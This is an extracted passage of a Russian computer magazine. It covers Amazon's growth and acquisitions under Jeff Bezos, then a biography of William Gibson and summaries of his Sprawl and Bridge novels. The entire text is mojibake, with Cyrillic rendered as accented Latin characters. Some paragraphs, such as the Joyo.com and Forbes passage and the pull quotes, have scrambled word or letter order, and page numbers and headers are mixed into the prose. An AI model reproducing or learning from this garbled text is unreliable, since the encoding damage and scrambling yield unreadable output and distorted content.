Áèçíåñ ðîñ òàê áûñòðî, ÷òî ñîçäàòåëü ìàãàçèíà áûë ïîðàæåí ñèëüíå å âñåõ îñòàëüíûõ. Êîãäà î êîìïàíèè âñåðüå ç çàãîâîðèëè â 1997 ãîäó, ñêåïòèêè âûð àçèëè ñåðüåçíûå ñîìíåíèÿ, ÷òî íîâè÷îê íà êíèæíîì ðûíêå, äà åùå è ðàáîòàþùèé èñê ëþ÷èòåëüíî â Ñåòè, ñìîæåò óäåðæàòü ñâî è ïîçèöèè ïîñëå ïîÿâëåíèÿ â Èíòåðíåòå òàêèõ ïðåäñòàâèòåëüñòâ ëèäåðîâ ðûíêà, êàê Barnes and Noble, Borders. Íî äâà ãîäà ñïóñòÿ ðûíî÷íàÿ ñòîèìîñòü àêöèé è äðóãèõ àêòèâîâ «Àìàçîíà» áûëà áîëüøå , ÷åì ñóììàðíàÿ ñòîèìîñòü àêöèé äâóõ åãî êðóïíåéøèõ êîíêóðåíòîâ. Òàê æå êîìïàí èÿ çàêëþ÷èëà ñäåë-

êó ñ «Áîðäåðñ», êîòîðà ÿ íå ìîãëà â îäèíî÷êó ñïðàâèòüñÿ ñî ñâîèì èíòåðíåò-òðàôèêîì. Ïîíà÷àëó Áåçîñ ñòàðàëñÿ êàê ìîæíî áûñòðåå ðàñøèðèòü ñâîþ äîë þ ðûíêà, âêëàäûâàÿ â äåëî âñå, ÷òî çàðàáàòûâ àë. Êîãäà Àmazon.com ïðåâðàòèë ñÿ èç ñàìîãî áîëüøîãî êíèæíîãî ìàãàçèíà íà ïëàíåòå â êðóïíåéøèé óíèâåðñàëüíûé ìàã àçèí, ñêåïòèêè çàãîâîðèëè î òîì, ÷òî «Àìàçî í» ðàçðàñòàåòñÿ ñëèøêîì áûñòðî. Òåìïû ðîñòà äåéñòâèòåëüíî îïåðåæàëè ïëàíû Äæ åôôà, íåñìîòðÿ íà ýòî, îí ïðîäîëæàë ïîääåð æèâàòü øåñòü îñíîâíûõ öåííîñòåé: âåð íîñòü êëèåíòó, ïðàâî ñîáñòâåííîñòè, àêòèâíîñò ü (ñòðåìëåíèå ê

äåéñòâèþ), ýêîíîìíîñòü, âûñîêèå çàïðîñû ê ïîñòóïàþùèì íà ðàáîòó è íîâàòîðñòâî. «Ó íàñ âñå âðàùàåòñÿ âîê ðóã êëèåíòà», — ãîâîðèë ñîçäàòåëü Amazo n. — Íàø ìàãàçèí — ýòî òî ìåñòî, ãäå ëþä è ìîãóò íàéòè è êóïèòü âñå, ÷òî òîëüêî ìîæ íî ïîæåëàòü, íå îòõîäÿ îò êîìïüþòåðà». «Àì àçîí» ïîñòåïåííî ââîäèë â ïðîäàæó ìóçûêà ëüíûå CD, âèäåî, èãðóøêè è ýëåêòðîíèêó. Êîãäà äðóãèå èíòåðíåò-ìàãàçèíû íà÷àëè ïîÿâëÿòüñÿ êàê ãðèáû ïîñëå äîæäÿ, Àmazo n.com ïðîâåë ñåðüåçíóþ ðåñòðóêòóðèçàöè þ. Ýòî ïîìîãëî îñòàòüñÿ íà ïëàâó äàæå òîã äà, êîãäà îñòàëüíûå ïðîãîðàëè è ñõîäèëè ñ äèñòàíöèè.

ÑÒÀÍÎÂËÅÍÈÅ AMAZONE TIMELINE / 1994-2 2004 /

 àïðåëå 1998 ãîäà «Àìàçîí» ïîêóïàåò Internet Movie Database (IMDb) — ãèãàíòñêóþ áàçó äàííûõ î ôèëüìàõ, àêòåðàõ, òåëåøîó è âèäåîèãðàõ. Ïðåâðàùåíèå IMDb èç îáùåíàðîäíîãî íåêîììåð÷åñêîãî ñàéòà â áèçíåñ-ìàøèíó áûëî âîñïðèíÿòî ìíîãèìè ïîëüçîâàòåëÿìè, êàê ïîùå÷èíà. Íî, êàê ïîêàçàëî âðåìÿ, íè÷åãî ñòðàøíîãî íå ïðîèçîøëî. Îñíîâíîé êîíòåíò IMDb îñòàëñÿ áåñïëàòíûì, çà íåáîëüøóþ ïëàòó ($100 â ãîä) êëèåíò ïîëó÷àë áîëåå óäîáíûé èíòåðôåéñ, ðàñøèðåííûé ïîèñê è íåñêîëüêî äðóãèõ ïðèÿòíûõ ïëþøåê.

084

 1999 ãîäó áûëà òàêæå êóïëåíà ñèñòåìà Alexa Internet. Ýòà ñäåëêà îáîøëàñü â 250 ìèëëèîíîâ äîëëàðîâ. Íà ñåãîäíÿøíèé äåíü Alexa ïðåäñòàâëÿåò ñîáîé èíòåðåñíûé ñïëàâ ïîèñêîâîé ìàøèíû è áàçû äàííûõ î ðàçëè÷íûõ ñàéòàõ. Ïðè ïîìîùè ñïåöèàëüíûõ òóëáàðîâ, ðàçìåùåííûõ íà ñòðàíèöàõ åå ïàðòíåðñêîé ñåòè, îíà ñîáèðàåò èíôîðìàöèþ î êîëè÷åñòâå òðàôèêà, ïðîõîäÿùåãî ÷åðåç ýòè ðåñóðñû. Äàííûå î÷åíü òî÷íû, è êîëè÷åñòâî ñàéòîâ â ýòîé ñåòè îãðîìíî. Alexa Internet ñîòðóäíè÷àåò ñ ñåðâèñàìè Google è Open Directory, ÷òî äåëàåò ýòîò ðåéòèíã ïî-íàñòîÿùåìó àâòîðèòåòíûì.  òîì æå 1999 ãîäó èçâåñòíûé æóðíàë Time íàçâàë Äæåôôðè Áåçîñà ÷åëîâåêîì ãîäà.

 îêòÿáðå 2002-ãî ãîäà «Àìàçîí» çàíÿëñÿ åùå è ïðîäàæåé îäåæäû, çàêëþ÷èâ êîíòðàêòû ñ èçâåñòíûìè ëåéáëàìè, ñðåäè êîòîðûõ òàêèå òèòàíû, êàê The Gap, Nordstrom è Land's End. Òàê æå ìàãàçèí îòêðûë ÷åðåç ñâîé ñàéò äîñòóï ê åøîïàì ñâîèõ ïàðòíåðîâ: Borders, Toys R Us è äðóãèì.

À â ñåíòÿáðå 2003 ãîäà «Àìàçîí» ïðåäñòàâèë ñîáñòâåííóþ ïîèñêîâóþ ñèñòåìû A9. Ïîèñêîâèê îòëè÷àåòñÿ îò äðóãèõ ïîäîáíûõ ñèñòåì ðÿäîì èíòåðåñíûõ äåòàëåé. Íàïðèìåð, À9 ñòàë ïåðâûì ïîèñêîâèêîì, îðèåíòèðîâàííûì íà ïîèñê òîâàðîâ ñðåäè îãðîìíîé ñåòè èíòåðíåò-ìàãàçèíîâ. Ïîèñêîâ��ê ïîìîãàåò íàõîäèòü íå òîëüêî òîâàðû, íî è âåñòè ïîèñê âíóòðè êíèã. Ïîëüçóÿñü äîñòóïîì ê Google, A9 íåïëîõî èùåò èíôó è â Èíòåðíåòå. Îäíîâðåìåííî ñ íîâîé ïîèñêîâîé ñèñòåìîé, «Àìàçîí» îòêðûâàåò ïðîäàæó ñïîðòèâíûõ òîâàðîâ — áîëåå 3000 ðàçëè÷íûõ áðåíäîâ.

ì 2004-ì ãîäó êî à åë áð èî ïàíèÿ ïð íûé Joyo.com — êðóï òíå òåð èí èé ñê êèòàé èà÷ çí î ÷ò ìàãàçèí, î òåëüíî ðàñøèðèë » íà çî ìà «À å íè âëèÿ àõ. â Àçèàòñêèõ ñòðàí ÿâÄæåôôðè Áåçîñ ì íû ÿí ñòî ïî ëÿåòñÿ àëà ó÷àñòíèêîì æóðí ñîñForbes, êîòîðûé ûõ ñàì îê èñ ñï òàâëÿåò àáîãàòûõ ëþäåé Ïë èâ íåòû. Ïðàâäà, åñë èìàë 1999 ãîäó îí çàí îì 19 ìåñòî ñ êàïèòàë ëäî îâ ðä èà ëë â 10 ìè ëàðäîâ, â 2005 îí âëàòîëüêî íà 41-ì, àìè. ðä èà ëë ìè äåÿ 4,8

XÀÊÅÐ 01 /85/ 06


CÖÅÍÀ ///// ÄÆÅÔÔ ÁÅÇÎÑ

Amazon — ìíîãîíàöèîíàëüíûé ìàãàçèí

ÍÀØ ÌÀÃÀÇÈÍ — ÝÒÎ ÒÎ ÌÅÑ ÒÎ, ÃÄÅ ËÞÄÈ ÌÎÃÓÒ ÍÀÉÒÈ È ÊÓÏ ÈÒÜ ÂÑÅ, ×ÒÎ ÒÎËÜÊÎ ÌÎÆÍÎ ÏÎÆÅËÀÒÜ , ÍÅ ÎÒÕÎÄß ÎÒ ÊÎÌÏÜÞÒÅÐÀ

32 êàòåãîðèè òîâàðîâ amazon.com

XÀÊÅÐ 01 /85/ 06

085


ÑÖÅÍÀ ÂÇËÎÌ ÑÖÅÍÀ ///// ISSUE

TEXT MINDW0RK / mindw0rk@gameland.ru/

ÆÈÇÍÜ È ÒÂÎÐ×ÅÑÒÂÎ ÓÈËÜßÌÀ ÃÈÁÑÎÍÀ  ËÈÒÅÐÀÒÓÐÅ ÍÅ ÒÀÊ ÌÍÎÃÎ ÏÈÑÀÒÅËÅÉ, ÊÎÒÎÐÛÅ ÏÈØÓÒ Â ÆÀÍÐÅ ÊÈÁÅГ ÏÀÍÊ. À ÊÓËÜÒÎÂÛÕ ÀÂÒÎÐÎÂ, ÏÐÎÈÇÂÅÄÅÍÈßÌÈ ÊÎÒÎÐÛÕ ÇÀ×ÈÒÛÂÀÞÒÑß ÊÎÌÏÜÞÒÅÐÙÈÊÈ, ÅÙÅ ÌÅÍÜØÅ. È ÒÎËÜÊÎ ÎÄÍÎÃÎ ÈÇ ÍÈÕ Ñ×ÈÒÀÞÒ ÏÐÀÐÎÄÈÒÅËÅÌ ÆÀÍÐÀ. ÈÌß ÓÈËÜßÌÀ ÃÈÁÑÎÍÀ ÈÇÂÅÑÒÍÎ ÏÐÀÊÒÈ×ÅÑÊÈ ÂÑÅÌ, ÊÒÎ ÏÐÎÂÎÄÈÒ ÌÍÎÃÎ ÂÐÅÌÅÍÈ Â ÑÅÒÈ. ÍÎ ÄÀËÅÊÎ ÍÅ ÂÑÅ ×ÈÒÀÒÅËÈ ÅÃÎ ÏÐÎÈÇ-

ÂÅÄÅÍÈÉ ÇÍÀÊÎÌÛ Ñ ÆÈÇÍÜÞ ÂÛÄÀÞÙÅÃÎÑß ÏÈÑÀÒÅËß ÐÀÍÍÅÅ ÒÂÎÐ×ÅÑÒÂÎ Óèëüÿì Ôîðä Ãèáñîí ðîäèëñÿ 17 ìàðòà 1948 ãîäà â ìàëåíüêîì àìåðèêàíñêîì ãîðîäêå Êîíâåé, Þæíàÿ Êàðîëèíà, ãäå åãî ðîäèòåëè ïðåäïî÷èòàëè ïðîâîäèòü ñâîé îòïóñê. Ýòî áûëî âðåìÿ ðàííåãî òåëåâèäåíèÿ, àâòîìîáèëåé, ïî ôîðìå íàïîìèíàþùèõ ðàêåòû, è èãðóøåê, ñäåëàííûõ ïî ìîòèâàì íàó÷íî-ôàíòàñòè÷åñêèõ ðàññêàçîâ. Ìàëåíüêîãî Óèëüÿìà, êàê è ìíîãèõ ðîâåñíèêîâ, ïðèòÿãèâàëè âñå ýòè ÷óäåñà òåõíèêè. Îòåö çàíèìàë íåâûñîêóþ äîëæíîñòü â êðóïíîé ñòðîèòåëüíîé êîìïàíèè è ïî ðàáîòå ÷àñòî áûâàë â îòúåçäàõ. Îäíàæäû, êîãäà Óèëüÿì áûë åùå ñîâñåì ðåáåíêîì, îí óåõàë â î÷åðåäíóþ êîìàíäèðîâêó è áîëüøå íå âåðíóëñÿ. ×òî ñ íèì ñëó÷èëîñü, óçíàòü òàê è íå óäàëîñü, ìàòü ïðîñòî ñîîáùèëà ñûíó, ÷òî îòåö ïîãèá. Ïîñëå ýòîãî çàáðàëà ðåáåíêà è ïåðååõàëà â ñâîé ðîäíîé ãîðîä ê þãîçàïàäó îò Âèðäæèíèè. Óèëüÿì òÿæåëî ïåðåæèâàë èñ÷åçíîâåíèå îòöà, åãî ïîñòîÿííî âèäåëè îòñòðàíåííûì, âèòàþùèì â îáëàêàõ. Èìåííî â ýòî âðåìÿ ðàçî÷àðîâàíèÿ æèçíüþ, ïîòåðÿâ îòöà è îêàçàâøèñü â ÷óæîì, óäàëåííîì îò öèâèëèçàöèè ãîðîäå, Ãèáñîí óâëåêñÿ ôàíòàñòèêîé. Óãëóáèâøèñü â êíèãè, îí æèë ïðîèçâåäåíèÿìè èçâåñòíûõ àìåðèêàíñêèõ ôàíòàñòîâ, ñ íàñòîÿùåé îäåðæèìîñòüþ çàïîëíÿÿ êíèæíûå ïîëêè íîâûìè òîìàìè è ïîäøèâêàìè æóðíàëîâ. Òå-

086

ïåðü ó íåãî áûëà çàâåòíàÿ ìå÷òà — ñòàòü ïèñàòåëåì. Êîãäà åìó èñïîëíèëîñü 17 ëåò, ìàòü îòäàëà ñûíà â ïðèâàòíóþ øêîëó äëÿ ìàëü÷èêîâ â Àðèçîíå. Óèëüÿì áûë äàëåêî íå â âîñòîðãå îò ýòîãî, øêîëà âûçûâàëà â íåì òîñêó, è, âäîõíîâëåííûé ïðîèçâåäåíèÿìè ôàíòàñòà Óèëüÿìà Áýððîóçà, îí ïðèíÿëñÿ ñîçäàâàòü â ñåáå îáðàç «Ïàöèåíòà Çåðî». Ïðîòåñòîâàë ïðîòèâ ïîðÿäêîâ â øêîëå, ñòàðàëñÿ âûãëÿäåòü è âåñòè ñåáÿ íå òàê, êàê îñòàëüíûå ìàëü÷èêè â øêîëå, êóðèë ìàðèõóàíó.  êîíöå êîíöîâ åãî âûãíàëè, è îí âåðíóëñÿ äîìîé, ãäå îáíàðóæèë, ÷òî ìàòü óìåðëà. Ðîäñòâåííèêè íå ñòðåìèëèñü ïîääåðæàòü îñèðîòåâøåãî ïîäðîñòêà, è, êîãäà íà÷àëàñü Âüåòíàìñêàÿ âîéíà, 20-ëåòíèé Óèëüÿì îòïðàâèëñÿ â Êàíàäó âìåñòå ñ äðóãèìè «ïîäðîñòêàìè-äåçåðòèðàìè», òàê êàê åìó ìåíüøå âñåãî õîòåëîñü áåãàòü ñ âèíòîâêîé ïî äæóíãëÿì. Ïåðâûå ãîäû â Òîðîíòî áûëè ñàìûìè ñëîæíûìè. Ó Óèëüÿìà íå áûëî ñïåöèàëüíîñòè è ïðèõîäèëîñü ïîñòîÿííî êðóòèòüñÿ, ÷òîáû âûæèòü.  1972 ãîäó îí âñòðåòèë äåâóøêó èç Âàíêóâåðà, ó íèõ çàâÿçàëèñü îòíîøåíèÿ, è â òîì æå ãîäó îíè âìåñòå ïåðååõàëè â åå ðîäíîé ãîðîä. Èìåííî òàì, æåíèâøèñü, îêîí÷èâ óíèâåðñèòåò è îñîçíàâ, ÷òî ó íåãî ñîâåðøåííî íåò æåëàíèÿ ñòðîèòü êàêóþ-ëèáî êàðüåðó, Ãèáñîí ñòàë ïèñàòü ñâîè ïåðâûå ïðîèçâåäåíèÿ.  îñíîâíîì ýòî áûëè ôóòóðèñòè÷åñêèå èñòîðèè î âëèÿíèè êèáåðïðîñòðàíñòâà è òåõíîëîãèé íà æèçíü ëþäåé â áóäó-

XÀÊÅÐ 01 /85/ 06


ïèøóùàÿ ìàøèíêà Ãèáñîíà

ùåì.  1977 ãîäó â íàó÷íî-ôàíòàñòè÷åñêîì æóðíàëå UnEarth áûë âïåðâûå îïóáëèêîâàí åãî ðàññêàç «Îñêîëêè ãîëîãðàôè÷åñêîé ðîçû» î íîâîì âèäå ðàçâëå÷åíèÿ Ñèì-Ñòèì, íàïîìèíàþùåì âèðòóàëüíóþ ðåàëüíîñòü. Âîîáùå, ïðåäñòàâëåíèå î áóäóùåì ó Ãèáñîíà â êîðíå îòëè÷àëîñü îò ïðåäñòàâëåíèé áîëüøèíñòâà ôàíòàñòîâ òîãî âðåìåíè. Ïèñàòåëè ãðåçèëè î êîñìîñå, ðîáîòàõ, âíåçåìíûõ öèâèëèçàöèÿõ, â òî âðåìÿ êàê Ãèáñîí ñ÷èòàë, ÷òî áóäóùåå ñòîèò çà êîìïüþòåðíûìè ñåòÿìè. Ýòà òåìà áûëà ðàñêðûòà â ñëåäóþùèõ åãî ðàáîòàõ: «Êîíòèíóóì Ãåðíñáåêà» (1981), «Äæîííè Ìíåìîíèê» (1981), «Ñîææåíèå Õðîì» (1982), êîòîðûå ïîÿâèëèñü â ìíîãîòèðàæíîì æóðíàëå «Îìíè». Íî íàñòîÿùàÿ ñëàâà ïðèøëà ê ïèñàòåëþ â 1984 ãîäó, êîãäà âûøåë åãî ïåðâûé ðîìàí «Íåéðîìàíò». ÒÐÈËÎÃÈß SPRAWL Ãëàâíûé ãåðîé êíèãè — Êåéñ, ãåíèàëüíûé õàêåð (àâòîð íàçûâàåò åãî «êîâáîåì êîíñîëåé»), êîòîðûé ìîæåò ïîäêëþ÷àòü ñâîé ìîçã íàïðÿìóþ ê êîìïüþòåðàì, è çàðàáàòûâàåò íà æèçíü âçëîìîì ñåêðåòíûõ êîìïüþòåðíûõ ñèñòåì. Âî âðåìÿ âûïîëíåíèÿ îäíîãî èç çàäàíèé çàêàç÷èêîâ, Êåéñ ïîïûòàëñÿ èõ íàäóòü, íî ïîïûòêà îêàçûâàåòñÿ íåóäà÷íîé.  îòìåñòêó ðàáîòîäàòåëè ââîäÿò â òåëî õàêåðà ñèëüíîäåéñòâóþùèé òîêñèí, êîòîðûé ïîâðåæäàåò åãî íåðâíóþ ñèñòåìó, â ðåçóëüòàòå ÷åãî îí òåðÿåò âîçìîæíîñòü ïîäêëþ÷àòüñÿ ê öèôðîâîé ìàòðèöå. Íà÷èíàåòñÿ ïîâåñòü ñ ñîáûòèé, êîòîðûå ïðîèñõîäÿò íåêîòîðîå âðåìÿ ñïóñòÿ. Êåéñ òåïåðü ðàáîòàåò îáû÷íûì ñëóæàùèì íà îäíîì èç ÷åðíûõ ðûíêîâ Òîêèî, ãäå çíàêîìèòñÿ ñ Ìîëëè — äåâóøêîé-êèëëåðîì, òåëî êîòîðîé íàïîëîâèíó ñîñòîèò èç èìïëàíòîâ (âìåñòî íîãòåé ó íåå óäëèíåííûå ñòàëüíûå ëåçâèÿ). Îíà ðåøàåò ïîìî÷ü ïàðíþ è ñâîäèò åãî ñî ñâîèì øåôîì — áûâ-

íèÿ. Óèëüÿì Ãèáñîí íàðóøèë èõ âñå. Íåñìîòðÿ íà ýòî (âîçìîæíî, èìåííî ïîýòîìó), «Íåéðîìàíò» ñòàë êóëüòîâûì ïðîèçâåäåíèåì. Ðîìàí çàâîåâàë òðè îñíîâíûå íàó÷íî-ôàíòàñòè÷åñêèå íàãðàäû: Íåáóëà, Õüþãî è íàãðàäó Ôèëèïïà Äèêà. Îí ñîçäàë ñîâåðøåííî íîâûé ëèòåðàòóðíûé æàíð — «êèáåðïàíê».  åãî ïðîèçâåäåíèÿõ ìèð ïîäåëåí ìåæäó îãðîìíûìè ìóëüòèíàöèîíàëüíûìè êîðïîðàöèÿìè, òåõíîëîãèÿìè, íåãàòèâíî âëèÿþùèìè íà æèçíü ëþäåé, à ãëàâíûå ïåðñîíàæè — àíòèãåðîè, ïðîòèâîïîñòàâëÿþùèå ñåáÿ ñîöèàëüíûì íîðìàì. ×òî èíòåðåñíî, Óèëüÿì Ãèáñîí òîãäà íå îñîáî ðàçáèðàëñÿ â êîìïüþòåðàõ è èìåë ïîâåðõíîñòíûå çíàíèÿ î êîìïüþòåðíûõ ñåòÿõ (îí äàæå íå çíàë î ñóùåñòâîâàíèè õàêåðîâ), íî íà îñíîâå ñâîèõ ïðåäñòàâëåíèé ñìîäåëèðîâàë ìèð, êîòîðûé âî ìíîãîì íàïîìèíàåò ñîâðåìåííûé. Äâà ãîäà ñïóñòÿ ïîñëå âûõîäà «Íåéðîìàíòà», Ãèáñîí íàïèñàë íîâûé ðîìàí ïîä íàçâàíèåì «Íóëåâîé îòñ÷åò» (ïîòîì ïèñàòåëü îáúåäèíèò èõ â òðèëîãèþ The Sprawl). Îí ïðîäîëæàåò ñþæåòíóþ ëèíèþ «Íåéðîìàíòà», è òåïåðü ÷èòàòåëü óçíàåò î íîâåéøåé òåõíîëîãèè — Ìààñêèõ áèî÷èïàõ, ñîçäàâàåìûõ ñ èñïîëüçîâàíèåì áåññìåðòíûõ ÷åëîâå÷åñêèõ êëåòîê ðàêà. Çà ðàçðàáîò÷èêîì ÷èïîâ îõîòèòñÿ ñàìûé áîãàòûé ÷åëîâåê íà ïëàíåòå — Äæîçåô Âàéðåê, ðàññ÷èòûâàþùèé ñ èõ ïîìîùüþ îáðåñòè áåññìåðòèå. Count Zero — ïñåâäîíèì þíîãî õàêåðà Áîááè Íüþìàðêà, ìå÷òàþùåãî îäíàæäû ñòàòü âåëè÷àéøèì êèáåðêîâáîåì. Âî âðåìÿ îäíîãî èç ñâîèõ âçëîìîâ ïàðåíü ïîïàäàåò â êðóïíûå íåïðèÿòíîñòè è ðèñêóåò æèçíüþ. Íî åãî ñïàñàþò æðåöû âèðòóàëüíîãî êóëüòà Loa, íàçûâàþùèå ñåáÿ áîãàìè voodoo. Òàê êàê ðàçðàáîò÷èê áèî÷èïîâ Êðèñòîôåð Ìèò÷åëë ÿâëÿåòñÿ ïðèâåðæåíöåì êóëüòà, òî ïðîòèâîñòîÿíèÿ âëàñòè è æèòåëåé ñåòè íå ìèíîâàòü.

ÒÅ — ËÎÂÅÊ ÍÀ ÏËÀÍÅÒ ÒÛÉ ×ÅË ÛÉ ÁÎÃÀÒ ÀÌ Ñ ß Ñß Ò ÈÒ Ò ÕΠΠΠÈÏ × ÎÌ ÒÈÅ. ÇÀ ÐÀÇÐÀÁÎÒ×ÈÊ ÅÐÒ ÈÕ ÏÎÌÎÙÜÞ ÎÁÐÅÑÒÈ ÁÅÑÑÌ Ñ É ÙÈ ÀÞ ÛÂ Ò ÈÒ × Ñ× ÀÑ Ð , ÐÅÊ Ô ÂÀÉ ÄÆÎÇÅÔ

øèì âîåííûì Ýðìèòåéæ, êîòîðûé ñîãëàøàåòñÿ âûëå÷èòü õàêåðà çà îïðåäåëåííûå õàêåðñêèå óñëóãè. Åùå íå çíàÿ, ÷òî çàäóìàë Ýðìèòåéæ, Êåéñ çàêëþ÷àåò ñäåëêó, âòàéíå íàäåÿñü, ÷òî íîâûé ðàáîòîäàòåëü äàñò åìó ãëàâíîå — äåíüãè è äîñòóï ê ïåðåäîâûì òåõíîëîãèÿì.  ïðîöåññå âûïîëíåíèÿ çàäà÷è — êðàæè áåñöåííîãî ROMìîäóëÿ, ñîäåðæàùåãî êîïèþ ðàçóìà ëåãåíäàðíîãî õàêåðà Äèêñè Ôëåòëàéíà, — Êåéñ è è Ìîëëè óçíàþò î òàéíîì ïðîøëîì Ýðìèòåéæà è âñòðå÷àþòñÿ ñ íîâûìè ïåðñîíàæàìè: âîðîì è íàðêîìàíîì Ïèòåðîì Ðåâüåðîé, ñïîñîáíûì ïðîåöèðîâàòü ðåàëèñòè÷íûå ãîëîãðàììû, Äæóëèóñîì Äèíîì — 135-ëåòíèì êîíòðàáàíäèñòîì-ïàðàíîèêîì, ëåäè 3Jane, êîíòðîëèðóþùåé ãðàíèöû îáèòàíèÿ ñèñòåì Èñêóññòâåííîãî Èíòåëëåêòà, Wintermute — îäíîé èç ñèñòåì ÈÈ, êîòîðàÿ ñûãðàåò áîëüøóþ ðîëü â æèçíè ãëàâíûõ ãåðîåâ, è, íàêîíåö, Íåéðîìàíòîì — ðàçóìíîé ïðîãðàììîé, ñòîÿùåé ó íèõ íà ïóòè. Êîãäà Ãèáñîí ïèñàë «Íåéðîìàíò», îí ñ÷èòàë, ÷òî åãî òâîðåíèå îöåíÿò î÷åíü íåìíîãèå. Ê òîìó âðåìåíè ó ïèñàòåëåé-ôàíòàñòîâ ñëîæèëñÿ ðÿä ïðàâèë, êîòîðûå ãàðàíòèðîâàëè óñïåõ ïðîèçâåäåèãðà «Íåéðîìàíò» ïî ìîòèâàì îäíîèìåííîãî ðîìàíà

XÀÊÅÐ 01 /85/ 06

Çàêàí÷èâàåòñÿ òðèëîãèÿ êíèãîé «Ìîíà Ëèçà Îâåðäðàéâ», âûøåäøåé â 1988 ãîäó. Îíà ñîñòîèò èç 4-õ ñþæåòíûõ ëèíèé, ïåðåïëåòàþùèõñÿ äðóã ñ äðóãîì. Ãëàâíàÿ ãåðîèíÿ Ìîíà — 16-ëåòíÿÿ äåâóøêà ñ ìðà÷íûì ïðîøëûì è íåîïðåäåëåííûì áóäóùèì, îêàçûâàåòñÿ äâîéíèêîì îäíîé èç ãëàâíûõ çíàìåíèòîñòåé ìåæäóíàðîäíîé ñåòè Ýíäæè Ìèøåëü. Ýòî ñõîäñòâî õîòÿò èñïîëüçîâàòü â ñâîèõ öåëÿõ ñåêðåòíûå îðãàíèçàöèè, êîòîðûå «ïîêóïàþò» åå ó áîéôðåíäà è, ñ ïîìîùüþ ïëàñòè÷åñêîé õèðóðãèè, äåëàþò èç íåå òî÷íóþ êîïèþ Ýíäæè. Êîìó íà ñàìîì äåëå ïîíàäîáèëîñü âûäàòü Ìîíó çà ñåòåâóþ çâåçäó è çà÷åì, ñòàíîâèòñÿ èçâåñòíî òîëüêî ê êîíöó ðîìàíà. Ïî õîäó ðàçâèòèÿ ñîáûòèé ÷èòàòåëü âñòðå÷àåò ñòàðûõ ãåðîåâ: Ìîëëè, ïîâçðîñëåâøåãî Áîááè Íüþìàðêà, ëåäè 3Jane è óçíàåò, ÷òî ïðîèçîøëî ñ íèìè ñïóñòÿ íåñêîëüêî ëåò. ÒÐÈËÎÃÈß BRIDGE Ïîñëå ñâîåé çíàìåíèòîé êèáåðïàíê-òðèëîãèè, Ãèáñîí ñòàë âñåìèðíî èçâåñòíûì. Òåïåðü îí ìîã äî ñòàðîñòè ïî÷èâàòü íà ëàâðàõ, íî îí ïðîäîëæèë ïèñàòü. È âñå åãî äàëüíåéøèå êíèãè áûëè î÷åíü îæèäàåìûìè è ñòàíîâèëèñü õèòàìè åùå äî ñâîåãî ïîÿâëåíèÿ.  1990 ãîäó â ñîàâòîðñòâå ñ èçâåñòíûì êîìïüþòåðíûì ïèñàòåëåì Áðþñîì Ñòåðëèíãîì, Ãèáñîí íàïèñàë «Äâèãàòåëü ðàçëè÷èé». Ýòîò âçãëÿä íà àëüòåðíàòèâíóþ èñòîðèþ, êîòîðàÿ ìîãëà áû ïðîèçîéòè, åñëè áû ñîâðåìåííûå îòêðûòèÿ áûëè ñäåëàíû åùå âî âðåìåíà ìàøèíû Áýááèäæà (1822 ãîä), ñäåëàëà ïîïóëÿðíûì íîâûé ëèòåðàòóðíûé æàíð — ñòèìïàíê.  êíèãå Âåëèêîáðèòàíèÿ ñòàíîâèòñÿ ñòðàíîé íîìåð îäèí â ìèðå, â òî âðåìÿ êàê ÑØÀ ðàñïàäàåòñÿ íà íåñêîëüêî íåçàâèñèìûõ øòàòîâ. À â îñíîâó ñþæåòà ëåãëà áîðüáà

087


CÖÅÍÀ ///// ISSUE

ÈÍÒÅÐÅÑÍÛÅ

Û Ò Ê À Ô ÈÇ ÒÂÎÐ×ÅÑÒÂÀ

ÃÈÁÑÎÍÀ

ìåæäó íåñêîëüêèìè èñòîðè÷åñêèìè ïåðñîíàæàìè çà âëàäåíèå öåííûìè êîìïüþòåðíûìè ïåðôîêàðòàìè. Ãëàâíûì òðóäîì Óèëüÿìà Ãèáñîíà íà ïðîòÿæåíèè 90-õ ãîäîâ ñòàëà òðèëîãèÿ Bridge. Äëÿ íåêîòîðûõ îíà áûëà ðàçî÷àðîâàíèåì, òàê êàê Ãèáñîí îòîøåë îò îïèñàíèÿ êèáåðïàíêîâîãî áóäóùåãî, ïîõîæäåíèé êîìïüþòåðíûõ êîâáîåâ: åãî íîâûå ðàáîòû áûëè áîëåå ïðèáëèæåííûìè ê ðåàëüíîñòè, è ñêîðåå îòíîñèëèñü ê äåòåêòèâíîìó æàíðó. Ïåðâûì ðîìàíîì èç ñåðèè ñòàë «Âèðòóàëüíûé ñâåò», âûøåäøèé â 1993 ãîäó. Ãëàâíàÿ ãåðîèíÿ ×åâåòò Âàøèíãòîí ðàáîòàåò îáû÷íûì âåëîñèïåäíûì êóðüåðîì è æèâåò â ðàéîíå çàêðûòîãî ìîñòà, êîòîðûé ñòàë ðàåì äëÿ áåçäîìíûõ.  îäèí èç ñâîèõ ðàáî÷èõ äíåé îíà ïîõèùàåò èçÿùíûå î÷êè, êîòîðûå íà ñàìîì äåëå îêàçûâàþòñÿ íîâåéøèì ïðèáîðîì äëÿ âçàèìîäåéñòâèÿ ñ âèðòóàëüíîé ðåàëüíîñòüþ. Íàéòè ïðîïàæó ïîðó÷àþò ïîëèöåéñêîìó Áýððè Ðàéäåëëó: åìó íå òîëüêî ïðåäñòîèò íàéòè ×åâåòò, íî òàê æå îòêðûòü òàéíó ýòèõ î÷êîâ. Âòîðîé ðîìàí òðèëîãèè — «Èäîðó» (1996). Èäîðó — ýòî ÿïîíñêîå ñëîâî, ïðîèçîøåäøåå îò àìåðèêàíñêîãî «èäîë». Òàê íàçûâàþò Ðåé Òîýé — ñàìóþ ïîïóëÿðíóþ ìóçûêàëüíóþ çâåçäó ßïîíèè, êîòîðîé âîñõèùàþòñÿ âñå… íî åå íå ñóùåñòâóåò. Òîýé — âñåãî ëèøü ñëîæíàÿ ïðîãðàììà, íàïèñàííàÿ äëÿ èñïîëíåíèÿ ïåñåí íà êîíöåðòàõ. Êîíå÷íî, ó íåå åñòü ïðèâëåêàòåëüíàÿ îáîëî÷êà, îíà ñïîñîáíî ïîääåðæàòü ðàçãîâîð. Íî ó íåå íåò äóøè.  òî æå âðåìÿ äðóãàÿ çâåçäà ÿïîíñêîé ìóçûêè — ãèòàðèñò Ðåç èç ïîïóëÿðíîé ðîê-ãðóïïû — ðåàëåí. È, áóäó÷è áîëüøèì ïîêëîííèêîì Òîýé, íàìåðåâàåòñÿ æåíèòüñÿ íà íåé. Òàêîé ïîâîðîò íå óñòðàèâàåò âëèÿòåëüíûõ ìåíåäæåðîâ, êîòîðûì ãðóïïà Ðåçà ïðèíîñèò íåìàëûå äåíüãè, è îíè ïûòàþòñÿ åãî 